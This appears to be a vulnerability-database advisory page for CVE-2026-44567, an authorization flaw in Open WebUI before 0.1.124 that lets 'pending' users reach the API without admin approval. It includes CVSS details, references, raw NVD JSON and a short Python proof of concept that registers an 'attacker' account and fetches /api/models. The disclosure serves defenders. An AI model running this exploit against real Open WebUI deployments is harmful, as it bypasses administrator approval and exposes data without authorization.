CVE-2026-44567

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.1.124

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL target_url = "http://localhost:3000" # Step 1: Register a new user (Default role is pending) register_data = { "username": "attacker", "password": "password123", "email": "[email protected]" } session = requests.Session() response = session.post(f"{target_url}/api/auth/register", json=register_data) if response.status_code == 200: print("[+] Registration successful. User in 'pending' state.") # Step 2: Attempt to access a protected API endpoint without admin approval # In a vulnerable version, this bypasses the role check api_response = session.get(f"{target_url}/api/models") if api_response.status_code == 200: print("[+] Vulnerability exploited! Access granted to 'pending' user.") print(f"[+] Data: {api_response.text}") else: print("[-] Access denied.") else: print("[-] Registration failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44567
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44567
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44567/
[4] VulDB https://vuldb.com/cve/CVE-2026-44567
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44567", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:53.050", "lastModified": "2026-05-15T22:16:53.050", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.1.124, the API does not properly validate that the user has an authorized user role of user. By default, when Open WebUI is configured with new sign-ups enabled, the default user role is set to pending. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either user or admin before that user is able to access the web application. This vulnerability is fixed in 0.1.124."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-602"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf", "source": "[email protected]"}]}}